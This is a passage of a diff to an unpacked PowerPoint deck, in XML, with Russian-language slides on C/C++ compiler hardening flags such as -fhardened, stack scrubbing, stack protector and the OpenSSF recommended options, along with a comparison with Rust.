+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FEC7107-7759-4748-AC28-29389492175F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9475693" y="1762661"/>
+            <a:ext cx="2196353" cy="923330"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="285750" indent="-285750">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рассматривались дефолтные флаги </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Linux-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>версии</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1802210905"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide85.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4C022F-D41B-4B03-8A65-58F2114C9E48}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в безопасных языках</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Text Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6853D1FD-408A-472A-B24F-E4551AF7928C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E712A9D-7C7A-4FC8-9DF7-07C7CED672C8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>85</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3232067582"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide86.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA933E97-8F69-4423-AB25-ACEB2004EA82}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="497541" y="-74146"/>
+            <a:ext cx="10515600" cy="1325563"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Сравнение с </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Rust</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:graphicFrame>
+        <p:nvGraphicFramePr>
+          <p:cNvPr id="6" name="Table 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B100581C-268E-4180-9009-ACDCF3C31CEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGraphicFramePr>
+            <a:graphicFrameLocks noGrp="1"/>
+          </p:cNvGraphicFramePr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1115383481"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
@@ -29064,7 +33784,7 @@
           <a:p>
             <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>83</a:t>
+              <a:t>86</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -29074,791 +33794,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3460494525"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide84.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Другие опции</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Slide Number Placeholder 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF60EB6-4D51-481C-9223-8D6829AF904C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
-              <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>84</a:t>
-            </a:fld>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762390909"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide85.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что дальше </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О некоторых опциях мы не успели поговорить</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.):</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>S</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>tack scrubbing – очистка</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>стека при выходе из функции (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-fstrub</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Очистка регистров при выходе из функции </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-fzero-call-used-regs</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Опции для защиты от аппаратных атак </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Spectre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, etc.)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fhardened</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>– зонтичная</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>опция для наиболее важных </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardened-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>оптимизаций</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включает все опции, рекомендованные </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Compiler Options Hardening Guide for C and C++</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>LLVM #122687</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Конкретный набор зависит от версии компилятора</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно посмотреть функцию </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>print_help_hardened</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сейчас</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrivial</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-auto-var-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=zero -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fPIE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -Wl,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -Wl,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection=full</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Slide Number Placeholder 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F0C61A-D298-401E-8D62-8688B8F32571}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
-              <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>85</a:t>
-            </a:fld>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide86.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
